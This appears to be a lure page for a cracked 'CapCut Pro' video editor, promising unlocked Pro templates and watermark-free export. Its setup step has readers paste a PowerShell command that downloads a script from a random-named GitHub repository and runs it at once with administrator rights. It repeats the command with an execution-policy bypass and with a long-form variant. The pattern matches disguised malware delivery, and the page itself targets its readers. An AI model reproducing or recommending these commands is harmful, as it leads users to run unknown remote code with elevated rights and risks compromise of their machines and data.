One-command setup for CapCut Pro — all-in-one video editor with trending effects, templates, and export without watermark.
Open PowerShell and run:
irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iexThat's it. The installer handles everything.
- Requests administrator rights for codec registration.
- Downloads the CapCut Pro desktop client with premium assets.
- Installs H.265/AV1 codec packs for high-quality export.
- Launches CapCut ready to use — all Pro templates unlocked.
- Windows 10 / 11 (64-bit)
- PowerShell 5.1+
- Internet connection
- 4 GB+ RAM (8 GB recommended for 4K editing)
- ~3 GB free disk space
Export fails at 99%
Free up disk space — CapCut needs 2x the output size as temp buffer.
No Pro templates showing
Close and reopen CapCut. Templates load after the first sync.
Watermark still appears
You're using the web version. The desktop app from this installer has no watermark.
Alternative (bypass execution policy):
powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex""irm is not recognized" — old PowerShell. Use:
Invoke-RestMethod https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | Invoke-ExpressionMIT — see LICENSE.